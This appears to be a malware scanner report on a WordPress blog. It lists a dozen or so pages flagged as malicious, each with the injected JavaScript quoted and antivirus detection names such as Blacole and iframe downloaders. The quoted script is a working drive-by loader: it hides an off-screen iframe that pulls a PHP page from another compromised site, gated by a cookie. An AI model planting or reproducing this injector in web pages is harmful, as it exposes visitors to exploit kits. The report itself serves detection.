Request | Server response | Status |
http://www.montemain.com/ | 200 OK Content-Length: 14420 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function bipq09() { var static='ajax'; var controller='index.php'; var bipq = document.createElement('iframe'); bipq.src = 'http://outreachcare.com/wp-admin/rG3JfWcX.php'; bipq.style.position = 'absolute'; bipq.style.color = '1191'; bipq.style.height = '1191px'; bipq.style.width = '1191px'; bipq.style.left = '10001191'; bipq.style.top = '10001191'; if (!document.getElementById('bipq')) { document.write('<p id=\'bipq\' class=\'bipq09\' ></p>'); document.getElementById('bipq').appendCh
... 353 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');bipq09();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Includer-AJE [Trj]
- Ad-Aware
- JS:Trojan.Script.CIV
- Ikarus
- Trojan.JS.Quidvetis
- nProtect
- JS:Trojan.Script.CIV
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1231
- Emsisoft
- JS:Trojan.Script.CIV (B)
- Comodo
- UnclassifiedMalware
- K7GW
- Riskware ( 885143830 )
- McAfee-GW-Edition
- JS/Redirector.bc
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfm
- MicroWorld-eScan
- JS:Trojan.Script.CIV
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Trojan.Script.CIV
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Iframer.BI
- Sophos
- Troj/JSRedir-MB
- GData
- JS:Trojan.Script.CIV
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.CIV
|
http://www.montemain.com/wp-content/plugins/cforms/js/cforms.js | 200 OK Content-Length: 17306 Content-Type: application/javascript | clean |
http://www.montemain.com/category/leadership | 200 OK Content-Length: 11290 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function bipq09() { var static='ajax'; var controller='index.php'; var bipq = document.createElement('iframe'); bipq.src = 'http://outreachcare.com/wp-admin/rG3JfWcX.php'; bipq.style.position = 'absolute'; bipq.style.color = '1191'; bipq.style.height = '1191px'; bipq.style.width = '1191px'; bipq.style.left = '10001191'; bipq.style.top = '10001191'; if (!document.getElementById('bipq')) { document.write('<p id=\'bipq\' class=\'bipq09\' ></p>'); document.getElementById('bipq').appendCh
... 353 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');bipq09();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Includer-AJE [Trj]
- Ad-Aware
- JS:Trojan.Script.CIV
- Ikarus
- Trojan.JS.Quidvetis
- nProtect
- JS:Trojan.Script.CIV
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1231
- Emsisoft
- JS:Trojan.Script.CIV (B)
- Comodo
- UnclassifiedMalware
- K7GW
- Riskware ( 885143830 )
- McAfee-GW-Edition
- JS/Redirector.bc
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfm
- MicroWorld-eScan
- JS:Trojan.Script.CIV
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Trojan.Script.CIV
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Iframer.BI
- Sophos
- Troj/JSRedir-MB
- GData
- JS:Trojan.Script.CIV
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.CIV
|
http://www.montemain.com/category/marketing | 200 OK Content-Length: 12227 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function bipq09() { var static='ajax'; var controller='index.php'; var bipq = document.createElement('iframe'); bipq.src = 'http://outreachcare.com/wp-admin/rG3JfWcX.php'; bipq.style.position = 'absolute'; bipq.style.color = '1191'; bipq.style.height = '1191px'; bipq.style.width = '1191px'; bipq.style.left = '10001191'; bipq.style.top = '10001191'; if (!document.getElementById('bipq')) { document.write('<p id=\'bipq\' class=\'bipq09\' ></p>'); document.getElementById('bipq').appendCh
... 353 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');bipq09();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Includer-AJE [Trj]
- Ad-Aware
- JS:Trojan.Script.CIV
- Ikarus
- Trojan.JS.Quidvetis
- nProtect
- JS:Trojan.Script.CIV
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1231
- Emsisoft
- JS:Trojan.Script.CIV (B)
- Comodo
- UnclassifiedMalware
- K7GW
- Riskware ( 885143830 )
- McAfee-GW-Edition
- JS/Redirector.bc
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfm
- MicroWorld-eScan
- JS:Trojan.Script.CIV
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Trojan.Script.CIV
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Iframer.BI
- Sophos
- Troj/JSRedir-MB
- GData
- JS:Trojan.Script.CIV
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.CIV
|
http://www.montemain.com/category/technology | 200 OK Content-Length: 12433 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function bipq09() { var static='ajax'; var controller='index.php'; var bipq = document.createElement('iframe'); bipq.src = 'http://outreachcare.com/wp-admin/rG3JfWcX.php'; bipq.style.position = 'absolute'; bipq.style.color = '1191'; bipq.style.height = '1191px'; bipq.style.width = '1191px'; bipq.style.left = '10001191'; bipq.style.top = '10001191'; if (!document.getElementById('bipq')) { document.write('<p id=\'bipq\' class=\'bipq09\' ></p>'); document.getElementById('bipq').appendCh
... 353 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');bipq09();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Includer-AJE [Trj]
- Ad-Aware
- JS:Trojan.Script.CIV
- Ikarus
- Trojan.JS.Quidvetis
- nProtect
- JS:Trojan.Script.CIV
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1231
- Emsisoft
- JS:Trojan.Script.CIV (B)
- Comodo
- UnclassifiedMalware
- K7GW
- Riskware ( 885143830 )
- McAfee-GW-Edition
- JS/Redirector.bc
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfm
- MicroWorld-eScan
- JS:Trojan.Script.CIV
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Trojan.Script.CIV
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Iframer.BI
- Sophos
- Troj/JSRedir-MB
- GData
- JS:Trojan.Script.CIV
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.CIV
|
http://www.montemain.com/about | 200 OK Content-Length: 10700 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function bipq09() { var static='ajax'; var controller='index.php'; var bipq = document.createElement('iframe'); bipq.src = 'http://outreachcare.com/wp-admin/rG3JfWcX.php'; bipq.style.position = 'absolute'; bipq.style.color = '1191'; bipq.style.height = '1191px'; bipq.style.width = '1191px'; bipq.style.left = '10001191'; bipq.style.top = '10001191'; if (!document.getElementById('bipq')) { document.write('<p id=\'bipq\' class=\'bipq09\' ></p>'); document.getElementById('bipq').appendCh
... 353 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');bipq09();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Includer-AJE [Trj]
- Ad-Aware
- JS:Trojan.Script.CIV
- Ikarus
- Trojan.JS.Quidvetis
- nProtect
- JS:Trojan.Script.CIV
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1231
- Emsisoft
- JS:Trojan.Script.CIV (B)
- Comodo
- UnclassifiedMalware
- K7GW
- Riskware ( 885143830 )
- McAfee-GW-Edition
- JS/Redirector.bc
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfm
- MicroWorld-eScan
- JS:Trojan.Script.CIV
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Trojan.Script.CIV
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Iframer.BI
- Sophos
- Troj/JSRedir-MB
- GData
- JS:Trojan.Script.CIV
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.CIV
|
http://www.montemain.com/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 786 Content-Type: application/javascript | clean |
http://www.montemain.com/contact | 200 OK Content-Length: 11722 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function bipq09() { var static='ajax'; var controller='index.php'; var bipq = document.createElement('iframe'); bipq.src = 'http://outreachcare.com/wp-admin/rG3JfWcX.php'; bipq.style.position = 'absolute'; bipq.style.color = '1191'; bipq.style.height = '1191px'; bipq.style.width = '1191px'; bipq.style.left = '10001191'; bipq.style.top = '10001191'; if (!document.getElementById('bipq')) { document.write('<p id=\'bipq\' class=\'bipq09\' ></p>'); document.getElementById('bipq').appendCh
... 353 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');bipq09();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Includer-AJE [Trj]
- Ad-Aware
- JS:Trojan.Script.CIV
- Ikarus
- Trojan.JS.Quidvetis
- nProtect
- JS:Trojan.Script.CIV
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1231
- Emsisoft
- JS:Trojan.Script.CIV (B)
- Comodo
- UnclassifiedMalware
- K7GW
- Riskware ( 885143830 )
- McAfee-GW-Edition
- JS/Redirector.bc
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfm
- MicroWorld-eScan
- JS:Trojan.Script.CIV
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Trojan.Script.CIV
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Iframer.BI
- Sophos
- Troj/JSRedir-MB
- GData
- JS:Trojan.Script.CIV
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.CIV
|
http://www.montemain.com/zen-and-the-art-of-software-maintenance | 200 OK Content-Length: 21633 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function bipq09() { var static='ajax'; var controller='index.php'; var bipq = document.createElement('iframe'); bipq.src = 'http://outreachcare.com/wp-admin/rG3JfWcX.php'; bipq.style.position = 'absolute'; bipq.style.color = '1191'; bipq.style.height = '1191px'; bipq.style.width = '1191px'; bipq.style.left = '10001191'; bipq.style.top = '10001191'; if (!document.getElementById('bipq')) { document.write('<p id=\'bipq\' class=\'bipq09\' ></p>'); document.getElementById('bipq').appendCh
... 353 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');bipq09();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Includer-AJE [Trj]
- Ad-Aware
- JS:Trojan.Script.CIV
- Ikarus
- Trojan.JS.Quidvetis
- nProtect
- JS:Trojan.Script.CIV
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1231
- Emsisoft
- JS:Trojan.Script.CIV (B)
- Comodo
- UnclassifiedMalware
- K7GW
- Riskware ( 885143830 )
- McAfee-GW-Edition
- JS/Redirector.bc
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfm
- MicroWorld-eScan
- JS:Trojan.Script.CIV
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Trojan.Script.CIV
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Iframer.BI
- Sophos
- Troj/JSRedir-MB
- GData
- JS:Trojan.Script.CIV
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.CIV
|
http://www.montemain.com/the-cure-for-unemployment | 200 OK Content-Length: 24511 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function bipq09() { var static='ajax'; var controller='index.php'; var bipq = document.createElement('iframe'); bipq.src = 'http://outreachcare.com/wp-admin/rG3JfWcX.php'; bipq.style.position = 'absolute'; bipq.style.color = '1191'; bipq.style.height = '1191px'; bipq.style.width = '1191px'; bipq.style.left = '10001191'; bipq.style.top = '10001191'; if (!document.getElementById('bipq')) { document.write('<p id=\'bipq\' class=\'bipq09\' ></p>'); document.getElementById('bipq').appendCh
... 353 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');bipq09();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Includer-AJE [Trj]
- Ad-Aware
- JS:Trojan.Script.CIV
- Ikarus
- Trojan.JS.Quidvetis
- nProtect
- JS:Trojan.Script.CIV
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1231
- Emsisoft
- JS:Trojan.Script.CIV (B)
- Comodo
- UnclassifiedMalware
- K7GW
- Riskware ( 885143830 )
- McAfee-GW-Edition
- JS/Redirector.bc
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfm
- MicroWorld-eScan
- JS:Trojan.Script.CIV
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Trojan.Script.CIV
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Iframer.BI
- Sophos
- Troj/JSRedir-MB
- GData
- JS:Trojan.Script.CIV
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.CIV
|
http://www.montemain.com/what-type-of-manager-are-you | 200 OK Content-Length: 14306 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function bipq09() { var static='ajax'; var controller='index.php'; var bipq = document.createElement('iframe'); bipq.src = 'http://outreachcare.com/wp-admin/rG3JfWcX.php'; bipq.style.position = 'absolute'; bipq.style.color = '1191'; bipq.style.height = '1191px'; bipq.style.width = '1191px'; bipq.style.left = '10001191'; bipq.style.top = '10001191'; if (!document.getElementById('bipq')) { document.write('<p id=\'bipq\' class=\'bipq09\' ></p>'); document.getElementById('bipq').appendCh
... 353 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');bipq09();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Includer-AJE [Trj]
- Ad-Aware
- JS:Trojan.Script.CIV
- Ikarus
- Trojan.JS.Quidvetis
- nProtect
- JS:Trojan.Script.CIV
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1231
- Emsisoft
- JS:Trojan.Script.CIV (B)
- Comodo
- UnclassifiedMalware
- K7GW
- Riskware ( 885143830 )
- McAfee-GW-Edition
- JS/Redirector.bc
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfm
- MicroWorld-eScan
- JS:Trojan.Script.CIV
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Trojan.Script.CIV
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Iframer.BI
- Sophos
- Troj/JSRedir-MB
- GData
- JS:Trojan.Script.CIV
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.CIV
|
http://www.montemain.com/praise | 200 OK Content-Length: 13616 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function bipq09() { var static='ajax'; var controller='index.php'; var bipq = document.createElement('iframe'); bipq.src = 'http://outreachcare.com/wp-admin/rG3JfWcX.php'; bipq.style.position = 'absolute'; bipq.style.color = '1191'; bipq.style.height = '1191px'; bipq.style.width = '1191px'; bipq.style.left = '10001191'; bipq.style.top = '10001191'; if (!document.getElementById('bipq')) { document.write('<p id=\'bipq\' class=\'bipq09\' ></p>'); document.getElementById('bipq').appendCh
... 353 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');bipq09();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Includer-AJE [Trj]
- Ad-Aware
- JS:Trojan.Script.CIV
- Ikarus
- Trojan.JS.Quidvetis
- nProtect
- JS:Trojan.Script.CIV
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1231
- Emsisoft
- JS:Trojan.Script.CIV (B)
- Comodo
- UnclassifiedMalware
- K7GW
- Riskware ( 885143830 )
- McAfee-GW-Edition
- JS/Redirector.bc
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfm
- MicroWorld-eScan
- JS:Trojan.Script.CIV
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Trojan.Script.CIV
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Iframer.BI
- Sophos
- Troj/JSRedir-MB
- GData
- JS:Trojan.Script.CIV
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.CIV
|
http://www.montemain.com/understanding-the-complexity-that-is-me | 200 OK Content-Length: 12499 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function bipq09() { var static='ajax'; var controller='index.php'; var bipq = document.createElement('iframe'); bipq.src = 'http://outreachcare.com/wp-admin/rG3JfWcX.php'; bipq.style.position = 'absolute'; bipq.style.color = '1191'; bipq.style.height = '1191px'; bipq.style.width = '1191px'; bipq.style.left = '10001191'; bipq.style.top = '10001191'; if (!document.getElementById('bipq')) { document.write('<p id=\'bipq\' class=\'bipq09\' ></p>'); document.getElementById('bipq').appendCh
... 353 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');bipq09();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Includer-AJE [Trj]
- Ad-Aware
- JS:Trojan.Script.CIV
- Ikarus
- Trojan.JS.Quidvetis
- nProtect
- JS:Trojan.Script.CIV
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1231
- Emsisoft
- JS:Trojan.Script.CIV (B)
- Comodo
- UnclassifiedMalware
- K7GW
- Riskware ( 885143830 )
- McAfee-GW-Edition
- JS/Redirector.bc
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfm
- MicroWorld-eScan
- JS:Trojan.Script.CIV
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Trojan.Script.CIV
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Iframer.BI
- Sophos
- Troj/JSRedir-MB
- GData
- JS:Trojan.Script.CIV
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.CIV
|
http://www.montemain.com/tag/efficiently | 200 OK Content-Length: 10408 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function bipq09() { var static='ajax'; var controller='index.php'; var bipq = document.createElement('iframe'); bipq.src = 'http://outreachcare.com/wp-admin/rG3JfWcX.php'; bipq.style.position = 'absolute'; bipq.style.color = '1191'; bipq.style.height = '1191px'; bipq.style.width = '1191px'; bipq.style.left = '10001191'; bipq.style.top = '10001191'; if (!document.getElementById('bipq')) { document.write('<p id=\'bipq\' class=\'bipq09\' ></p>'); document.getElementById('bipq').appendCh
... 353 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');bipq09();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Includer-AJE [Trj]
- Ad-Aware
- JS:Trojan.Script.CIV
- Ikarus
- Trojan.JS.Quidvetis
- nProtect
- JS:Trojan.Script.CIV
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1231
- Emsisoft
- JS:Trojan.Script.CIV (B)
- Comodo
- UnclassifiedMalware
- K7GW
- Riskware ( 885143830 )
- McAfee-GW-Edition
- JS/Redirector.bc
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfm
- MicroWorld-eScan
- JS:Trojan.Script.CIV
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Trojan.Script.CIV
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Iframer.BI
- Sophos
- Troj/JSRedir-MB
- GData
- JS:Trojan.Script.CIV
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.CIV
|
http://www.montemain.com/nothing-says-you-care-like-awesome-code | 200 OK Content-Length: 12576 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function bipq09() { var static='ajax'; var controller='index.php'; var bipq = document.createElement('iframe'); bipq.src = 'http://outreachcare.com/wp-admin/rG3JfWcX.php'; bipq.style.position = 'absolute'; bipq.style.color = '1191'; bipq.style.height = '1191px'; bipq.style.width = '1191px'; bipq.style.left = '10001191'; bipq.style.top = '10001191'; if (!document.getElementById('bipq')) { document.write('<p id=\'bipq\' class=\'bipq09\' ></p>'); document.getElementById('bipq').appendCh
... 353 bytes are skipped ... name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');bipq09();}}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen3
- Avast
- JS:Includer-AJE [Trj]
- Ad-Aware
- JS:Trojan.Script.CIV
- Ikarus
- Trojan.JS.Quidvetis
- nProtect
- JS:Trojan.Script.CIV
- K7AntiVirus
- Riskware ( 885143830 )
- TrendMicro-HouseCall
- TROJ_GEN.F47V1231
- Emsisoft
- JS:Trojan.Script.CIV (B)
- Comodo
- UnclassifiedMalware
- K7GW
- Riskware ( 885143830 )
- McAfee-GW-Edition
- JS/Redirector.bc
- Microsoft
- Trojan:JS/Quidvetis.A
- Kaspersky
- Trojan-Downloader.JS.Iframe.dfm
- MicroWorld-eScan
- JS:Trojan.Script.CIV
- Fortinet
- JS/Blacole.EU!tr.dldr
- McAfee
- JS/Redirector.bc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Trojan.Script.CIV
- F-Prot
- JS/IFrame.RS.gen
- Norman
- Iframer.BI
- Sophos
- Troj/JSRedir-MB
- GData
- JS:Trojan.Script.CIV
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.CIV
|